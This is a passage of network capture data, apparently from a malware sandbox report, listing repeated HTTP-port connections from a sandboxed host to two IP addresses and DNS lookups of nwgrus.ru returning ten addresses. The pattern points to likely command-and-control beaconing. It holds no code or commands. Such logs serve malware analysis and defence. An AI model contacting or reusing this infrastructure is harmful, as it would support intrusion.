Oct 13, 2024 17:03:14.797727108 CEST	49873	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:14.799767017 CEST	49882	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:14.804766893 CEST	80	49873	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:14.806061983 CEST	80	49882	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:14.806171894 CEST	49882	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:14.806333065 CEST	49882	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:14.808027029 CEST	49882	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:14.813427925 CEST	80	49882	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:14.814769030 CEST	80	49882	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:15.976577044 CEST	80	49882	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:15.976699114 CEST	80	49882	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:15.976762056 CEST	49882	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:15.976871014 CEST	49882	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:15.979903936 CEST	49890	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:15.982258081 CEST	80	49882	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:15.984932899 CEST	80	49890	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:15.985001087 CEST	49890	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:15.985131979 CEST	49890	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:15.985166073 CEST	49890	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:15.991193056 CEST	80	49890	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:15.991204977 CEST	80	49890	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:17.243900061 CEST	80	49890	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:17.244674921 CEST	80	49890	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:17.244744062 CEST	49890	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:17.244831085 CEST	49890	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:17.247486115 CEST	49896	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:17.250129938 CEST	80	49890	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:17.252420902 CEST	80	49896	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:17.252489090 CEST	49896	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:17.252623081 CEST	49896	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:17.252645016 CEST	49896	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:17.258215904 CEST	80	49896	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:17.258349895 CEST	80	49896	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:18.610971928 CEST	80	49896	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:18.612153053 CEST	80	49896	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:18.612427950 CEST	49896	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:18.612427950 CEST	49896	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:18.617937088 CEST	80	49896	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:26.622078896 CEST	50038	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:26.627234936 CEST	80	50038	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:26.627331972 CEST	50038	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:26.627563000 CEST	50038	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:26.627563000 CEST	50038	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:26.632961988 CEST	80	50038	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:26.633461952 CEST	80	50038	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:28.029043913 CEST	80	50038	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:28.029155016 CEST	80	50038	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:28.029184103 CEST	80	50038	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:28.029228926 CEST	50038	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:28.029230118 CEST	50038	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:28.029321909 CEST	50038	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:28.034533978 CEST	80	50038	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:32.905869007 CEST	50039	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:32.910968065 CEST	80	50039	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:32.911178112 CEST	50039	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:32.911271095 CEST	50039	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:32.911271095 CEST	50039	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:32.916522980 CEST	80	50039	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:32.916553020 CEST	80	50039	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:34.140043020 CEST	80	50039	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:34.140116930 CEST	80	50039	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:34.140280008 CEST	50039	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:34.140326977 CEST	50039	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:34.145302057 CEST	80	50039	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:38.177248001 CEST	50040	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:38.182682991 CEST	80	50040	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:38.182797909 CEST	50040	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:38.182934999 CEST	50040	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:38.182967901 CEST	50040	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:38.187859058 CEST	80	50040	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:38.187906027 CEST	80	50040	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:39.391208887 CEST	80	50040	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:39.391261101 CEST	80	50040	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:39.391352892 CEST	50040	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:39.391530037 CEST	50040	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:39.396564007 CEST	80	50040	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:43.318149090 CEST	50041	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:43.323273897 CEST	80	50041	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:43.323587894 CEST	50041	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:43.323587894 CEST	50041	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:43.326654911 CEST	50041	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:43.328644991 CEST	80	50041	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:43.331577063 CEST	80	50041	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:44.509438038 CEST	80	50041	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:44.509701014 CEST	80	50041	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:44.509897947 CEST	50041	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:44.509897947 CEST	50041	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:44.515180111 CEST	80	50041	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:48.781563044 CEST	50042	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:48.786787033 CEST	80	50042	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:48.786886930 CEST	50042	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:48.787045002 CEST	50042	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:48.787079096 CEST	50042	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:48.791924953 CEST	80	50042	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:48.792181015 CEST	80	50042	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:50.069689035 CEST	80	50042	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:50.069770098 CEST	80	50042	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:50.069868088 CEST	50042	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:50.070045948 CEST	50042	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:50.075010061 CEST	80	50042	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:54.547180891 CEST	50043	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:54.553078890 CEST	80	50043	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:54.553184986 CEST	50043	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:54.553349972 CEST	50043	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:54.553381920 CEST	50043	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:54.558430910 CEST	80	50043	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:54.558443069 CEST	80	50043	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:55.759946108 CEST	80	50043	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:55.759998083 CEST	80	50043	78.89.199.216	192.168.2.4
Oct 13, 2024 17:04:55.760103941 CEST	50043	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:55.760232925 CEST	50043	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:04:55.765090942 CEST	80	50043	78.89.199.216	192.168.2.4
Oct 13, 2024 17:05:00.277189970 CEST	50044	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:05:00.282720089 CEST	80	50044	78.89.199.216	192.168.2.4
Oct 13, 2024 17:05:00.282829046 CEST	50044	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:05:00.282948971 CEST	50044	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:05:00.282968998 CEST	50044	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:05:00.287978888 CEST	80	50044	78.89.199.216	192.168.2.4
Oct 13, 2024 17:05:00.288203001 CEST	80	50044	78.89.199.216	192.168.2.4
Oct 13, 2024 17:05:01.475089073 CEST	80	50044	78.89.199.216	192.168.2.4
Oct 13, 2024 17:05:01.475759029 CEST	80	50044	78.89.199.216	192.168.2.4
Oct 13, 2024 17:05:01.475817919 CEST	50044	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:05:01.478200912 CEST	50044	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:05:01.483138084 CEST	80	50044	78.89.199.216	192.168.2.4
Oct 13, 2024 17:05:06.191832066 CEST	50045	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:06.196970940 CEST	80	50045	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:06.197058916 CEST	50045	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:06.197248936 CEST	50045	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:06.197290897 CEST	50045	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:06.202508926 CEST	80	50045	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:06.202537060 CEST	80	50045	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:06.985910892 CEST	80	50045	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:06.986984968 CEST	80	50045	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:06.987166882 CEST	50045	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:06.988662004 CEST	50045	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:06.993597031 CEST	80	50045	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:10.835773945 CEST	50046	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:10.840984106 CEST	80	50046	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:10.841243029 CEST	50046	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:10.841243029 CEST	50046	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:10.841335058 CEST	50046	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:10.846546888 CEST	80	50046	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:10.846924067 CEST	80	50046	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:11.639252901 CEST	80	50046	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:11.639487028 CEST	80	50046	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:11.639705896 CEST	50046	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:11.647552967 CEST	50046	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:11.652762890 CEST	80	50046	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:15.984630108 CEST	50047	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:15.990159035 CEST	80	50047	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:15.990240097 CEST	50047	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:15.990360975 CEST	50047	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:15.990394115 CEST	50047	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:15.995266914 CEST	80	50047	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:15.995516062 CEST	80	50047	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:16.825057983 CEST	80	50047	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:16.825107098 CEST	80	50047	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:16.825134993 CEST	80	50047	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:16.825284958 CEST	50047	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:16.825285912 CEST	50047	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:16.825385094 CEST	50047	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:16.830280066 CEST	80	50047	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:21.862819910 CEST	50048	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:21.867942095 CEST	80	50048	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:21.868038893 CEST	50048	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:21.868154049 CEST	50048	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:21.868169069 CEST	50048	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:21.873539925 CEST	80	50048	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:21.873651981 CEST	80	50048	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:23.062016010 CEST	80	50048	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:23.062063932 CEST	80	50048	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:23.062093019 CEST	80	50048	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:23.062119961 CEST	80	50048	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:23.062242031 CEST	50048	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:23.062242985 CEST	50048	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:23.062242985 CEST	50048	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:23.062374115 CEST	50048	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:23.068356037 CEST	80	50048	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:27.906042099 CEST	50049	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:27.911626101 CEST	80	50049	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:27.911860943 CEST	50049	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:27.911989927 CEST	50049	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:27.911989927 CEST	50049	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:27.916857958 CEST	80	50049	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:27.916979074 CEST	80	50049	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:28.722807884 CEST	80	50049	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:28.723186970 CEST	80	50049	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:28.723372936 CEST	50049	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:28.723373890 CEST	50049	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:28.729046106 CEST	80	50049	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:33.735925913 CEST	50050	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:33.741894007 CEST	80	50050	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:33.742140055 CEST	50050	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:33.742224932 CEST	50050	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:33.742224932 CEST	50050	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:33.747045994 CEST	80	50050	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:33.747529030 CEST	80	50050	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:34.538161993 CEST	80	50050	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:34.539958000 CEST	80	50050	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:34.540143967 CEST	50050	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:34.540144920 CEST	50050	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:34.545373917 CEST	80	50050	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:39.538078070 CEST	50051	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:39.543400049 CEST	80	50051	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:39.543508053 CEST	50051	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:39.543642998 CEST	50051	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:39.543716908 CEST	50051	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:39.548437119 CEST	80	50051	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:39.548661947 CEST	80	50051	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:40.582794905 CEST	80	50051	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:40.582844019 CEST	80	50051	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:40.582873106 CEST	80	50051	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:40.583025932 CEST	50051	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:40.583025932 CEST	50051	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:40.583025932 CEST	50051	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:40.587959051 CEST	80	50051	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:45.094003916 CEST	50052	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:45.099169970 CEST	80	50052	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:45.099252939 CEST	50052	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:45.099385977 CEST	50052	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:45.099427938 CEST	50052	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:45.104536057 CEST	80	50052	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:45.104568958 CEST	80	50052	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:45.894088030 CEST	80	50052	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:45.894177914 CEST	80	50052	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:45.894238949 CEST	50052	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:45.898165941 CEST	50052	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:45.903048992 CEST	80	50052	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:49.931529999 CEST	50053	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:49.936806917 CEST	80	50053	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:49.937036037 CEST	50053	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:49.937036037 CEST	50053	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:49.937036037 CEST	50053	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:49.942228079 CEST	80	50053	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:49.942256927 CEST	80	50053	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:50.726022005 CEST	80	50053	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:50.727740049 CEST	80	50053	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:50.727890968 CEST	50053	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:50.727978945 CEST	50053	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:50.733088970 CEST	80	50053	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:55.265965939 CEST	50054	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:55.284661055 CEST	80	50054	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:55.284992933 CEST	50054	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:55.284992933 CEST	50054	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:55.284993887 CEST	50054	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:55.289963961 CEST	80	50054	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:55.290066004 CEST	80	50054	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:56.081058025 CEST	80	50054	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:56.081747055 CEST	80	50054	109.175.29.39	192.168.2.4
Oct 13, 2024 17:05:56.082118988 CEST	50054	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:56.082118988 CEST	50054	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:05:56.087374926 CEST	80	50054	109.175.29.39	192.168.2.4
Oct 13, 2024 17:06:00.378408909 CEST	50055	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:06:00.384020090 CEST	80	50055	109.175.29.39	192.168.2.4
Oct 13, 2024 17:06:00.384150028 CEST	50055	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:06:00.384315014 CEST	50055	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:06:00.384349108 CEST	50055	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:06:00.389223099 CEST	80	50055	109.175.29.39	192.168.2.4
Oct 13, 2024 17:06:00.389451981 CEST	80	50055	109.175.29.39	192.168.2.4
Oct 13, 2024 17:06:01.187680006 CEST	80	50055	109.175.29.39	192.168.2.4
Oct 13, 2024 17:06:01.188643932 CEST	80	50055	109.175.29.39	192.168.2.4
Oct 13, 2024 17:06:01.188740969 CEST	50055	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:06:01.188834906 CEST	50055	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:06:01.193869114 CEST	80	50055	109.175.29.39	192.168.2.4
Oct 13, 2024 17:06:05.958173990 CEST	50056	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:06:05.963494062 CEST	80	50056	109.175.29.39	192.168.2.4
Oct 13, 2024 17:06:05.963730097 CEST	50056	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:06:05.963869095 CEST	50056	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:06:05.963869095 CEST	50056	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:06:05.968836069 CEST	80	50056	109.175.29.39	192.168.2.4
Oct 13, 2024 17:06:05.969316959 CEST	80	50056	109.175.29.39	192.168.2.4
Oct 13, 2024 17:06:06.773713112 CEST	80	50056	109.175.29.39	192.168.2.4
Oct 13, 2024 17:06:06.774359941 CEST	80	50056	109.175.29.39	192.168.2.4
Oct 13, 2024 17:06:06.774445057 CEST	50056	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:06:06.774727106 CEST	50056	80	192.168.2.4	109.175.29.39
Oct 13, 2024 17:06:06.779587984 CEST	80	50056	109.175.29.39	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 17:02:29.738940001 CEST	62976	53	192.168.2.4	1.1.1.1
Oct 13, 2024 17:02:30.743540049 CEST	62976	53	192.168.2.4	1.1.1.1
Oct 13, 2024 17:02:31.743417978 CEST	62976	53	192.168.2.4	1.1.1.1
Oct 13, 2024 17:02:32.048778057 CEST	53	62976	1.1.1.1	192.168.2.4
Oct 13, 2024 17:02:32.048799038 CEST	53	62976	1.1.1.1	192.168.2.4
Oct 13, 2024 17:02:32.048810959 CEST	53	62976	1.1.1.1	192.168.2.4
Oct 13, 2024 17:05:06.014777899 CEST	61842	53	192.168.2.4	1.1.1.1
Oct 13, 2024 17:05:06.190921068 CEST	53	61842	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 13, 2024 17:02:29.738940001 CEST	192.168.2.4	1.1.1.1	0x6814	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:30.743540049 CEST	192.168.2.4	1.1.1.1	0x6814	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:31.743417978 CEST	192.168.2.4	1.1.1.1	0x6814	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:05:06.014777899 CEST	192.168.2.4	1.1.1.1	0xe812	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 13, 2024 17:02:32.048778057 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048778057 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048778057 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	197.164.156.210	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048778057 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	189.195.132.134	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048778057 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	201.103.8.135	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048778057 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	190.98.23.157	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048778057 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048778057 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	152.231.127.202	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048778057 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048778057 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048799038 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048799038 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048799038 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	197.164.156.210	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048799038 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	189.195.132.134	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048799038 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	201.103.8.135	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048799038 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	190.98.23.157	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048799038 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048799038 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	152.231.127.202	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048799038 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048799038 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
